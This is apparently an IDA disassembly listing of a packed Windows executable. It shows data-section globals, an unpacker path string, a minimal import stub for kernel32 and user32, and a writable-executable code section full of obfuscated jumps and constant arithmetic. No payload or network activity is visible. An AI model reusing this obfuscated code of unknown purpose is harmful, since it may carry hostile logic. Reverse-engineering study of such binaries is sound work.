					; sub_40B1A1:loc_40B1B3r ...
		dd 0
dword_4285BC	dd 0			; DATA XREF: sub_40449Dr
					; sub_40FC82+15r ...
dword_4285C0	dd 0			; DATA XREF: sub_404C4E+8Fw
					; zcrshv4o:off_41E418o
dword_4285C4	dd 0			; DATA XREF: sub_404C4E+99w
		dd 0
dword_4285CC	dd 0			; DATA XREF: sub_404C4E+8Aw
		dd 10h dup(0)
dword_428610	dd 0			; DATA XREF: sub_404C4E+BFw
					; sub_404C4E+DFr
		align 8
dword_428618	dd 0			; DATA XREF: sub_404C4E+7Bw
					; zcrshv4o:0041E41Co
		dd 22h dup(0)
word_4286A4	dw 0			; DATA XREF: sub_404C4E+4Fw
		align 4
word_4286A8	dw 0			; DATA XREF: sub_404C4E+48w
		align 4
word_4286AC	dw 0			; DATA XREF: sub_404C4E+41w
		align 10h
word_4286B0	dw 0			; DATA XREF: sub_404C4E+3Aw
		align 4
dword_4286B4	dd 0			; DATA XREF: sub_404C4E+26w
dword_4286B8	dd 0			; DATA XREF: sub_404C4E+20w
dword_4286BC	dd 0			; DATA XREF: sub_404C4E+1Aw
dword_4286C0	dd 0			; DATA XREF: sub_404C4E+14w
dword_4286C4	dd 0			; DATA XREF: sub_404C4E+Ew
dword_4286C8	dd 0			; DATA XREF: sub_404C4E+9w
dword_4286CC	dd 0			; DATA XREF: sub_404C4E+60w
dword_4286D0	dd 0			; DATA XREF: sub_404C4E+68w
					; sub_404C4E+85r
word_4286D4	dw 0			; DATA XREF: sub_404C4E+33w
		align 4
dword_4286D8	dd 0			; DATA XREF: sub_404C4E+57w
dword_4286DC	dd 0			; DATA XREF: sub_404C4E+70w
word_4286E0	dw 0			; DATA XREF: sub_404C4E+2Cw
		align 4
		dd 80h dup(0)
dword_4288E4	dd 0			; DATA XREF: sub_405004+15w
					; sub_405004+1Dw ...
word_4288E8	dw 0			; DATA XREF: sub_405229+E7w
		align 4
		dd 2 dup(0)
dword_4288F4	dd 4E4h			; DATA XREF: sub_405229+C3w
dword_4288F8	dd 0			; DATA XREF: sub_405229+CBw
dword_4288FC	dd 0			; DATA XREF: sub_405229+D3w
dword_428900	dd 0			; DATA XREF: sub_402E37+6r
					; sub_402F77+6r ...
		dd 8 dup(0)
off_428924	dd offset sub_4057B6	; DATA XREF: sub_405A96+30w
					; sub_405A96+51r ...
off_428928	dd offset sub_453B70	; DATA XREF: sub_4057BF+10r
					; sub_405A96+3Dw ...
off_42892C	dd offset sub_44A9FF	; DATA XREF: sub_4058DA+44r
					; sub_405A96+4Aw ...
off_428930	dd offset sub_44B73E	; DATA XREF: sub_4057E9+Br
					; sub_405A96+5Ew ...
		align 8
dword_428938	dd 15B418h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: sub_405E41+4o
					; .data:off_424800o
dword_428950	dd 15B440h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424808o
dword_428968	dd 15B468h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424818o
		dd 15B490h, 0FFFFFFFFh,	4 dup(0)
dword_428998	dd 15B4B8h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424830o
		dd 15B4E0h, 0FFFFFFFFh,	4 dup(0)
		dd 15B508h, 0FFFFFFFFh,	4 dup(0)
dword_4289E0	dd 15B530h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424850o
dword_4289F8	dd 15B558h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424860o
		dd 15B580h, 0FFFFFFFFh,	4 dup(0)
		dd 15B5A8h, 0FFFFFFFFh,	4 dup(0)
dword_428A40	dd 15B5D0h, 0FFFFFFFFh,	4 dup(0) ; DATA	XREF: .data:00424880o
		dd 15B6D8h, 0FFFFFFFFh,	4 dup(0)
		dd 15B700h, 0FFFFFFFFh,	4 dup(0)
dword_428A88	dd 0A00000h		; DATA XREF: sub_402FD3+7Cr
					; sub_403B91+62r ...
dword_428A8C	dd 0			; DATA XREF: sub_40609D+21w
					; sub_406110+21Cr ...
dword_428A90	dd 0			; DATA XREF: sub_407CFA+14r
					; sub_407CFA+29r ...
dword_428A94	dd 0			; DATA XREF: sub_40E632+19Er
dword_428A98	dd 2			; DATA XREF: .text:004045AAw
					; sub_407EC6:loc_407EEEr ...
dword_428A9C	dd 0A28h		; DATA XREF: .text:004045C1w
dword_428AA0	dd 501h			; DATA XREF: .text:004045B0w
dword_428AA4	dd 5			; DATA XREF: .text:004045B5w
					; sub_407EFD+30r
dword_428AA8	dd 1			; DATA XREF: .text:004045BBw
dword_428AAC	dd 1			; DATA XREF: sub_40B414+A2w
dword_428AB0	dd 0A02BA8h		; DATA XREF: sub_40B414+A7w
		align 8
dword_428AB8	dd 0A02BC8h		; DATA XREF: sub_40B1A1+4Bw
					; sub_40B1A1:loc_40B266r ...
		dd 3 dup(0)
off_428AC8	dd offset aCM_unpackerPac ; DATA XREF: sub_40B414+37w
					; "C:\\m_unpacker\\packed.exe"
		align 10h
byte_428AD0	db 0			; DATA XREF: sub_407FCB+2Cw
					; sub_4086FB+5r
		align 4
dword_428AD4	dd 1			; DATA XREF: sub_407FCB+23w
dword_428AD8	dd 1			; DATA XREF: sub_407FCB+1Br
					; sub_407FCB+A0w
dword_428ADC	dd 0			; DATA XREF: sub_408515+27o
dword_428AE0	dd 0			; DATA XREF: sub_408515+22r
dword_428AE4	dd 0			; DATA XREF: sub_408618+4w sub_408622r
dword_428AE8	dd 0			; DATA XREF: sub_4087BF+280w
					; sub_408CDB:loc_408D11w ...
		dd 3 dup(0)
dword_428AF8	dd 6 dup(0)		; DATA XREF: sub_40A074+66o
		db 0
byte_428B11	db 3 dup(0)		; DATA XREF: sub_40A074+8Ao
		dd 40h dup(0)
		db 0
byte_428C15	db 0			; DATA XREF: sub_40A074+92w
		align 4
		dd 7Dh dup(0)
dword_428E0C	dd 0			; DATA XREF: sub_403C6E+80r
					; sub_40A074+E3o ...
dword_428E10	dd 0			; DATA XREF: sub_40AC3F+8r
		align 8
aCM_unpackerPac	db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40B414+1Do
					; .data:off_428AC8o
		align 4
		dd 3Ah dup(0)
byte_428F1C	db 0			; DATA XREF: sub_40B414+24w
		align 10h
dword_428F20	dd 1			; DATA XREF: sub_40B4CD+2r
					; sub_40B4CD+24w ...
dword_428F24	dd 77C26E79h		; DATA XREF: sub_40B6DE+43r
					; sub_40B74A+11w ...
byte_428F28	db 0			; DATA XREF: sub_40B6DE:loc_40B717r
					; sub_40B74A+17w ...
		align 4
off_428F2C	dd offset sub_40C419	; DATA XREF: sub_40C465+Cr
					; sub_40C49C+Bw
dword_428F30	dd 1			; DATA XREF: sub_40C517+14r
					; sub_40C517+3Aw ...
dword_428F34	dd 1			; DATA XREF: sub_40C8FC+Fr
					; sub_40C8FC+37w ...
dword_428F38	dd 0			; DATA XREF: .data:off_424F3Co
					; .data:off_424F40o ...
dword_428F3C	dd 77E7C706h		; DATA XREF: sub_40D0BA+4w
					; sub_40D0D4+11r ...
dword_428F40	dd 0			; DATA XREF: sub_40DB7D+Ar
dword_428F44	dd 0			; DATA XREF: sub_40E28F+4w
					; sub_40E2E9:loc_40E332o ...
dword_428F48	dd 0			; DATA XREF: sub_40E28F+9w
					; sub_40E2E9:loc_40E388o ...
dword_428F4C	dd 0			; DATA XREF: sub_40E28F+Ew sub_40E2DCr ...
dword_428F50	dd 0			; DATA XREF: sub_40E28F+13w
					; sub_40E2E9:loc_40E394o ...
		align 8
dword_428F58	dd 0			; DATA XREF: sub_40E499+4w
		dd 2 dup(0)
dword_428F64	dd 0			; DATA XREF: sub_40E4A3+4w
		dd 0Fh dup(0)
dword_428FA4	dd 0			; DATA XREF: sub_4087BF+6r
dword_428FA8	dd 0			; DATA XREF: sub_40FAE4+10r
					; sub_40FAE4+60w ...
dword_428FAC	dd 0			; DATA XREF: sub_40FAE4+75w
					; sub_40FAE4:loc_40FC32r
dword_428FB0	dd 0			; DATA XREF: sub_40FAE4+82w
					; sub_40FAE4+167r
dword_428FB4	dd 0			; DATA XREF: sub_40FAE4+D0w
					; sub_40FAE4:loc_40FBB9r
dword_428FB8	dd 0			; DATA XREF: sub_40FAE4+BAw
					; sub_40FAE4+E1r ...
		align 10h
dword_428FC0	dd 0			; DATA XREF: sub_40FD2B+Fw
		dd 2Fh dup(0)
dword_429080	dd 0			; DATA XREF: sub_410E49:loc_410E71r
byte_429084	db 0			; DATA XREF: sub_411014:loc_411150r
		align 4
dword_429088	dd 0			; DATA XREF: sub_41A640+4Br
					; sub_41AAD0+E6w ...
dword_42908C	dd 0			; DATA XREF: sub_41A578+14r
					; sub_41A5DC+14r ...
dword_429090	dd 0			; DATA XREF: sub_41A502+1Dr
					; sub_41AAD0+136w ...
dword_429094	dd 0			; DATA XREF: sub_41A640+1Cr
					; sub_41AAD0+AAw ...
dword_429098	dd 0			; DATA XREF: sub_41AAD0+BEw
					; sub_41AAD0+16Dr ...
dword_42909C	dd 0			; DATA XREF: sub_41AAD0+D2w
					; sub_41AAD0+179r ...
dword_4290A0	dd 0			; DATA XREF: sub_41A578+34r
					; sub_41A5DC+34r ...
dword_4290A4	dd 0			; DATA XREF: sub_41A640+63r
					; sub_41AAD0+FAw ...
dword_4290A8	dd 0			; DATA XREF: sub_41AAD0+14Aw
					; sub_41AAD0+322r
dword_4290AC	dd 0			; DATA XREF: sub_41AAD0+96w
					; sub_41AAD0+155r ...
dword_4290B0	dd 0			; DATA XREF: sub_41A578+4Dr
					; sub_41A5DC+4Dr ...
dword_4290B4	dd 0			; DATA XREF: sub_401DED+6Dr
					; sub_41979F+A9w ...
dword_4290B8	dd 0			; DATA XREF: sub_401DA7+23r
					; sub_402129+14Fr ...
dword_4290BC	dd 0			; DATA XREF: sub_401DA7+1Dr
					; sub_402129+149r ...
dword_4290C0	dd 0			; DATA XREF: sub_401DA7+17r
					; sub_402129+143r ...
dword_4290C4	dd 0			; DATA XREF: sub_401DA7+11r
					; sub_402129+13Dr ...
dword_4290C8	dd 0			; DATA XREF: sub_401DA7+Br
					; sub_402129+137r ...
dword_4290CC	dd 0			; DATA XREF: sub_401DA7+5r
					; sub_402129+12Ar ...
dword_4290D0	dd 0			; DATA XREF: sub_4199DAr
					; sub_4199DA:loc_419A0Fw ...
dword_4290D4	dd 0			; DATA XREF: sub_4199DA+5r
					; sub_4199DA+3Bw ...
dword_4290D8	dd 0			; DATA XREF: sub_4199DA+15r
					; sub_419F7B+20w ...
dword_4290DC	dd 0			; DATA XREF: sub_419F7B+25w
		dd 33h dup(0)
dword_4291AC	dd 2 dup(0)		; DATA XREF: sub_419F7B+43o
word_4291B4	dw 0			; DATA XREF: sub_418FDD+8o
					; sub_41979F+AEw ...
word_4291B6	dw 0			; DATA XREF: sub_41979F+D1w
dword_4291B8	dd 0			; DATA XREF: sub_41979F+BDw
		dd 2 dup(0)
dword_4291C4	dd 0			; DATA XREF: sub_4198C0+6r
					; sub_4198C0+73r ...
dword_4291C8	dd 41h dup(0)		; DATA XREF: sub_4191D2+1EDo
					; sub_4191D2+224o ...
dword_4292CC	dd 0			; DATA XREF: sub_418FDD+Dr
					; sub_41979F+84w ...
byte_4292D0	db 0			; DATA XREF: sub_4191D2+293o
					; sub_4191D2+477o ...
		align 4
		dd 40h dup(0)
byte_4293D4	db 0			; DATA XREF: sub_4024A4:loc_40250Br
					; sub_41979F+117w ...
		align 4
dword_4293D8	dd 41h dup(0)		; DATA XREF: sub_4191D2:loc_4193EFo
					; sub_41979F+1Ao
dword_4294DC	dd 0			; DATA XREF: sub_40177B+263o
					; sub_4019F3+215o ...
byte_4294E0	db 0			; DATA XREF: sub_413FED+521r
					; sub_418F81:loc_418FB1r ...
		align 4
		dd 8 dup(0)
dword_429504	dd 0			; DATA XREF: sub_41BF50+33w
					; sub_41BF50+8Fr ...
dword_429508	dd 40h dup(0)		; DATA XREF: sub_41BD4E+49o
					; sub_41C0F3+21o
dword_429608	dd 0			; DATA XREF: sub_402086+Br
					; sub_4147B2+75w ...
		align 10h
byte_429610	db 0			; DATA XREF: sub_402129+16Bo
					; sub_41B1B7+D7o ...
		align 4
		dd 3Fh dup(0)
dword_429710	dd 0			; DATA XREF: sub_402129+170r
					; sub_41B1B7+45o
dword_429714	dd 0			; DATA XREF: sub_402129+17Er
					; sub_41B1B7:loc_41B342w ...
byte_429718	db 0			; DATA XREF: sub_4024A4+4B7w
		align 4
		dd 3Fh dup(0)
dword_429818	dd 0			; DATA XREF: sub_4024A4+44Ar
					; sub_4024A4+483w
		dd 3 dup(0)
		db 0
byte_429829	db 0			; DATA XREF: sub_4024A4:loc_40262Ar
					; .text:00402A71w
		align 4
		dd 3 dup(0)
dword_429838	dd 0			; DATA XREF: .text:loc_402A4Br
		dd 0F4Dh dup(0)
dword_42D570	dd 0AB8h dup(0)		; DATA XREF: sub_44B8EF+D9C9o
dword_430050	dd 1EBAh dup(0)		; DATA XREF: zcrshv4o:0041FFCCo
					; zcrshv4o:0041FFE8o
dword_437B38	dd 0			; DATA XREF: sub_402AA2+A6r
					; sub_4191D2+501r ...
		db 0
byte_437B3D	db 0			; DATA XREF: sub_4024A4+3Er
					; sub_41BF50:loc_41BF8Cw ...
		align 10h
dword_437B40	dd 0			; DATA XREF: sub_41BF50+13Bw
dword_437B44	dd 0			; DATA XREF: sub_402AA2+90r
					; sub_41BD4E:loc_41BEBCw ...
word_437B48	dw 0			; DATA XREF: sub_401EF9+A6w
					; sub_401EF9+BAw
		align 10h
byte_437B50	db 0			; DATA XREF: sub_414D82+9Fr
					; sub_414D82+1B4r ...
		align 4
		dd 31h dup(0)
		db 2 dup(0)
word_437C1A	dw 0			; DATA XREF: sub_414FA3+56o
		dd 2Bh dup(0)
byte_437CC8	db 0			; DATA XREF: sub_414D82:loc_414DDDo
					; sub_414D82:loc_414E4Er ...
		db 2 dup(0)
byte_437CCB	db 0			; DATA XREF: sub_414D82+119w
		dd 2 dup(0)
		db 2 dup(0)
byte_437CD6	db 0			; DATA XREF: sub_414D82+8Ew
					; sub_414D82+1A3w
		align 4
		db 2 dup(0)
byte_437CDA	db 0			; DATA XREF: sub_414D82+94w
					; sub_414D82+1A9w
		align 10h
byte_437CE0	db 0			; DATA XREF: sub_414D82+A7w
					; sub_414D82+BFw ...
		align 4
		dd 56h dup(0)
dword_437E3C	dd 0			; DATA XREF: sub_4182F6+110o
					; sub_41C71F+43o ...
dword_437E40	dd 0			; DATA XREF: sub_4182F6+109r
					; sub_4182F6+122r ...
dword_437E44	dd 0			; DATA XREF: sub_40121E+20r
					; sub_40121E:loc_40127Bw ...
dword_437E48	dd 0			; DATA XREF: sub_401EF9+D3o
					; sub_402086+22o ...
dword_437E4C	dd 0			; DATA XREF: sub_401EF9+C8r
					; sub_401EF9:loc_401FD9r ...
dword_437E50	dd 0			; DATA XREF: sub_4016BA+20r
					; sub_4016BA:loc_401717w ...
off_437E54	dd offset off_421C6C	; DATA XREF: .text:0041D007o
					; .text:0041D011w
off_437E58	dd offset off_421C64	; DATA XREF: .text:0041CFEBo
					; .text:0041CFF5w
off_437E5C	dd offset off_421CE8	; DATA XREF: .text:0041D03Fo
					; .text:0041D049w
off_437E60	dd offset off_421CF0	; DATA XREF: .text:0041D05Bo
					; .text:0041D065w
off_437E64	dd offset off_421CE0	; DATA XREF: .text:0041D023o
					; .text:0041D02Dw
off_437E68	dd offset off_421D54	; DATA XREF: .text:0041D077o
					; .text:0041D081w
off_437E6C	dd offset off_421D5C	; DATA XREF: .text:0041D093o
					; .text:0041D09Dw
off_437E70	dd offset off_421D64	; DATA XREF: .text:0041D0AFo
					; .text:0041D0B9w
off_437E74	dd offset off_421DB8	; DATA XREF: .text:0041D0E7o
					; .text:0041D0F1w
off_437E78	dd offset off_421DB0	; DATA XREF: .text:0041D0CBo
					; .text:0041D0D5w
off_437E7C	dd offset off_421E7C	; DATA XREF: .text:0041D103o
					; .text:0041D10Dw
off_437E80	dd offset off_421E84	; DATA XREF: .text:0041D11Fo
					; .text:0041D129w
off_437E84	dd offset off_421EB0	; DATA XREF: .text:0041D13Bo
					; .text:0041D145w
dword_437E88	dd 2080Ah		; DATA XREF: sub_41B3E7+472r
					; .text:0041D159w
off_437E8C	dd offset nullsub_469	; DATA XREF: .text:0041D181o
					; .text:0041D18Bw
off_437E90	dd offset off_422010	; DATA XREF: .text:0041D19Do
					; .text:0041D1A7w
off_437E94	dd offset off_422000	; DATA XREF: .text:0041D165o
					; .text:0041D16Fw
dword_437E98	dd 1			; DATA XREF: sub_404380r sub_40AEEFw ...
dword_437E9C	dd 1			; DATA XREF: sub_407930+28r
					; sub_408130+1Er ...
dword_437EA0	dd 0			; DATA XREF: sub_40AC3F+34r
dword_437EA4	dd 20h			; DATA XREF: sub_408DA0+3Cw
					; sub_408DA0+BFw ...
		dd 6 dup(0)
dword_437EC0	dd 0A020B0h		; DATA XREF: sub_406D96+FDr
					; sub_40864A+87r ...
		dd 3Fh dup(0)
dword_437FC0	dd 0A03188h		; DATA XREF: sub_40864A+2Bw
					; sub_40864A+44w ...
		dd 7 dup(0)
dword_437FE0	dd 400h	dup(0)		; DATA XREF: .data:off_424950o
					; .data:00424958o
dword_438FE0	dd 200h			; DATA XREF: sub_40864Ar
					; sub_40864A:loc_408664w ...
dword_438FE4	dd 0			; DATA XREF: sub_408125w
dword_438FE8	dd 1			; DATA XREF: sub_40B1A1+B3w
dword_438FEC	dd 0A0310Ch		; DATA XREF: sub_403297+10r
					; sub_403297+9Bw ...
dword_438FF0	dd 0A03100h		; DATA XREF: sub_403297+5r
					; sub_403297+87w ...
dword_438FF4	dd 1			; DATA XREF: sub_4053C3r
					; sub_4053C3+11w ...
dword_438FF8	dd 0			; DATA XREF: sub_407F39:loc_407FA2r
					; sub_407F39+74o ...
dword_438FFC	dd 0			; DATA XREF: sub_40609D+28w
					; sub_4060E5r ...
dword_439000	dd 0			; DATA XREF: sub_40609D+15w
					; sub_4060E5+6r ...
dword_439004	dd 0			; DATA XREF: sub_403C1F+13r
					; sub_40609D+36w ...
dword_439008	dd 0			; DATA XREF: sub_40609D+2Fw
					; sub_406110+2FCw ...
dword_43900C	dd 0			; DATA XREF: sub_40609D+3Cw
					; sub_406424r ...
dword_439010	dd 0			; DATA XREF: sub_406110+229r
					; sub_406110+249r ...
dword_439014	dd 1			; DATA XREF: sub_402FD3:loc_40300Cr
					; sub_403B91+13r ...
dword_439018	dd 152340h		; DATA XREF: .text:00404615w
					; sub_40B144:loc_40B155r ...
		align 1000h
_data		ends

; Section 5. (virtual address 0003B000)
; Virtual size			: 00001000 (   4096.)
; Section size in file		: 00001000 (   4096.)
; Offset to raw	data for section: 0003B000
; Flags	C0000040: Data Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure data
; Segment permissions: Read/Write
f5vy6ogb	segment	para public 'DATA' use32
		assume cs:f5vy6ogb
		;org 43B000h
dword_43B000	dd 3B0CCh, 0		; DATA XREF: sub_48DFC2:loc_48DFCBo
		dd 0FFFFFFFFh, 3B03Ch, 3B0B4h, 3B108h, 0
		dd 0FFFFFFFFh, 3B0E8h, 3B104h, 5 dup(0)
aKernel32_dl_11	db 'kernel32.dll',0
		align 4
		dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
		dd 694C6461h, 72617262h, 4179h,	65470000h, 6F725074h, 64644163h
		dd 73736572h, 0
		dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
		dd 6C6C416Ch, 636Fh, 69560000h,	61757472h, 6572466Ch, 65h
		dd 77E79F93h, 77E805D8h, 77E7A5FDh, 77E75CB5h, 77E7980Ah
		dd 77E79E34h, 3B04Ch, 3B060h, 3B070h, 3B084h, 3B094h, 3B0A4h
		dd 0
aUser32_dll_1	db 'user32.dll',0
		align 4
		dd 654D0000h, 67617373h, 786F4265h, 41h, 77D6ADD7h, 3B0F4h
		dd 3BDh	dup(0)
f5vy6ogb	ends

; ---------------------------------------------------------------------------
; Section 6. (virtual address 0003C000)
; Virtual size			: 00021000 ( 135168.)
; Section size in file		: 00021000 ( 135168.)
; Offset to raw	data for section: 0003C000
; Flags	E0000020: Text Executable Readable Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
k2vbe3_d	segment	para public 'CODE' use32
		assume cs:k2vbe3_d
		;org 43C000h
; START	OF FUNCTION CHUNK FOR sub_45AF0E
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

loc_43C000:				; CODE XREF: sub_45AF0E-C6BBj
					; DATA XREF: _3gijy9nr:0046F8C4o
		push	ds:dword_444F20
		retn
; END OF FUNCTION CHUNK	FOR sub_45AF0E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FAE2

loc_43C007:				; CODE XREF: sub_43FAE2+15BAAj
		call	sub_44D887
; END OF FUNCTION CHUNK	FOR sub_43FAE2
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_43C00C:				; CODE XREF: sub_43CCD0+98B2j
		jz	loc_453450
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; START	OF FUNCTION CHUNK FOR sub_444BEA

loc_43C012:				; CODE XREF: sub_444BEA-3F85j
		jmp	loc_45713C
; END OF FUNCTION CHUNK	FOR sub_444BEA
; ---------------------------------------------------------------------------
		or	edi, esi
		jmp	loc_45344C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_43C01E:				; CODE XREF: sub_4536DC+Dj
		shl	edx, 0Ch
; END OF FUNCTION CHUNK	FOR sub_4536DC
; START	OF FUNCTION CHUNK FOR sub_447692

loc_43C021:				; CODE XREF: sub_447692:loc_456536j
		mov	eax, 1D403CB1h
		call	sub_44A56B

loc_43C02B:				; CODE XREF: k2vbe3.d:00459262j
		jmp	loc_45A527
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D81

loc_43C030:				; CODE XREF: sub_452D81+1j
		jmp	loc_4499BC
; END OF FUNCTION CHUNK	FOR sub_452D81
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_43C035:				; CODE XREF: sub_448DD4-9Fj
		jmp	loc_44871B
; END OF FUNCTION CHUNK	FOR sub_448DD4

; =============== S U B	R O U T	I N E =======================================



sub_43C03A	proc near		; CODE XREF: sub_44921C+3B8Dp
					; k2vbe3.d:00458356j
		xchg	edi, [esp+0]
		pop	edi
		call	sub_4597AE

locret_43C043:				; CODE XREF: sub_44921C:loc_43CBB6j
		retn
sub_43C03A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45756B

loc_43C044:				; CODE XREF: sub_45756B-17AFj
		jmp	nullsub_431
; END OF FUNCTION CHUNK	FOR sub_45756B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_43C049:				; CODE XREF: sub_45A323-FF1Bj
		jmp	loc_44E655
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_43C04E	proc near		; CODE XREF: k2vbe3.d:loc_43C38Cp
					; k2vbe3.d:0043D1DEj ...

; FUNCTION CHUNK AT 0043E6A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044775C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044B542 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C7E3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CD08 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452340 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B2F SIZE 00000013 BYTES

		jz	loc_455B2F
		mov	eax, ds:dword_44BCF8
		jmp	loc_44CD08
sub_43C04E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_43C05F:				; CODE XREF: sub_4580DF:loc_4510BCj
		mov	byte ptr [eax],	0C3h
		jmp	loc_441B7A
; END OF FUNCTION CHUNK	FOR sub_4580DF

; =============== S U B	R O U T	I N E =======================================



sub_43C067	proc near		; CODE XREF: sub_41A390+82p
					; k2vbe3.d:00451950j
					; DATA XREF: ...

; FUNCTION CHUNK AT 0044000A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458693 SIZE 00000005 BYTES

		push	ecx
		push	0D9E1A6ABh
		pop	ecx
		add	ecx, 52928820h
		jmp	loc_458693
sub_43C067	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4454EF

loc_43C079:				; CODE XREF: sub_4454EF:loc_43D55Bj
		jl	loc_445093
		rol	eax, 5
		xor	edx, 0FAFCCAD3h
; END OF FUNCTION CHUNK	FOR sub_4454EF
; START	OF FUNCTION CHUNK FOR sub_43F2E0

loc_43C088:				; CODE XREF: sub_43F2E0+6E7j
		rol	esi, 1Dh

loc_43C08B:				; CODE XREF: sub_447E07:loc_45A0CAj
		shl	esi, 1Ah
		jmp	loc_445093
; END OF FUNCTION CHUNK	FOR sub_43F2E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_43C093:				; CODE XREF: sub_454F9F+2A3Fj
		jnz	loc_45897F
		jmp	loc_44F7B4
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------

loc_43C09E:				; CODE XREF: k2vbe3.d:004550FCj
		test	ecx, edx
		jmp	loc_456BD6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_43C0A5:				; CODE XREF: sub_44128B:loc_4523F7j
		jz	loc_45C0B1
		jmp	loc_43E889
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_43C0B0:				; CODE XREF: sub_4469E1:loc_43C814j
		xchg	esi, [esp+0]
		mov	ebp, esi
		pop	esi
		mov	eax, ds:dword_458BE0
		or	eax, eax
		jnz	loc_443962
		jmp	loc_44DC4F
; END OF FUNCTION CHUNK	FOR sub_4469E1
; ---------------------------------------------------------------------------

loc_43C0C9:				; DATA XREF: sub_44DB26+3o
		xchg	ebp, [esp]
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	23D4421Bh
		pop	eax
		or	eax, 624347F8h
		jmp	loc_448BCF
; ---------------------------------------------------------------------------

loc_43C0E3:				; CODE XREF: k2vbe3.d:004528B8j
		call	sub_43E135
		push	2A3945Bh
		pop	eax
		rol	eax, 0Fh
		add	eax, 3C54A71Ah
		sub	eax, 0FCE040A0h
		add	eax, 0DB835E7Eh
		jmp	loc_44335D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_172. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_43C109:				; CODE XREF: sub_449372+235Dj
		jmp	loc_453C79
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B44A

loc_43C10E:				; CODE XREF: sub_44B44A+7j
		jmp	loc_453CA6
; END OF FUNCTION CHUNK	FOR sub_44B44A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_43C113:				; CODE XREF: sub_457A58-1AB28j
		jmp	loc_4552EC
; END OF FUNCTION CHUNK	FOR sub_457A58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446BEB

loc_43C118:				; CODE XREF: sub_446BEB+Fj
		add	edx, 9D176F24h
		rol	edx, 14h
		add	edx, 338BAEB1h
		popf
		xchg	edx, [esp-4+arg_0]
		jmp	loc_44FF92
; END OF FUNCTION CHUNK	FOR sub_446BEB
; ---------------------------------------------------------------------------

loc_43C130:				; CODE XREF: k2vbe3.d:0045B3C4j
		call	sub_4553CC
		push	edx
		push	177CDF75h
		pop	edx
		sub	edx, 7F09DA25h
		or	edx, 8371525h
		add	edx, 67CACB87h
		jmp	loc_451CB2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_43C153:				; CODE XREF: sub_448B5E:loc_4593B2j
		xchg	eax, [esp+4+var_4]
		jmp	loc_4593B7
; END OF FUNCTION CHUNK	FOR sub_448B5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_43C15B:				; CODE XREF: sub_4529E2-A555j
		shr	ebx, 0Eh

loc_43C15E:				; CODE XREF: sub_4529E2:loc_458DA4j
		push	offset sub_444944

loc_43C163:				; CODE XREF: k2vbe3.d:loc_456CD9j
		jmp	loc_454110
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4561C3

loc_43C168:				; CODE XREF: sub_4561C3+14j
		xchg	eax, [esp+8+var_8]
		mov	ecx, eax
		pop	eax
		xor	ecx, 6B7461h
		or	ecx, 0C7E61E99h
		sub	ecx, 551BECEBh
		and	ecx, 0BCE73701h
		jmp	loc_447A03
; END OF FUNCTION CHUNK	FOR sub_4561C3
; ---------------------------------------------------------------------------

loc_43C18B:				; DATA XREF: k2vbe3.d:0044CB13o
		call	sub_4553CC
		push	offset sub_44C305
		jmp	loc_45996A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_43C19A:				; CODE XREF: sub_43C3A9+1AE84j
					; sub_4504F3+6D45j
		rol	eax, 1Eh
		or	eax, 38C79719h
		and	eax, 86D255A6h
		cmp	eax, 0D88E813Ah
		jmp	loc_449176
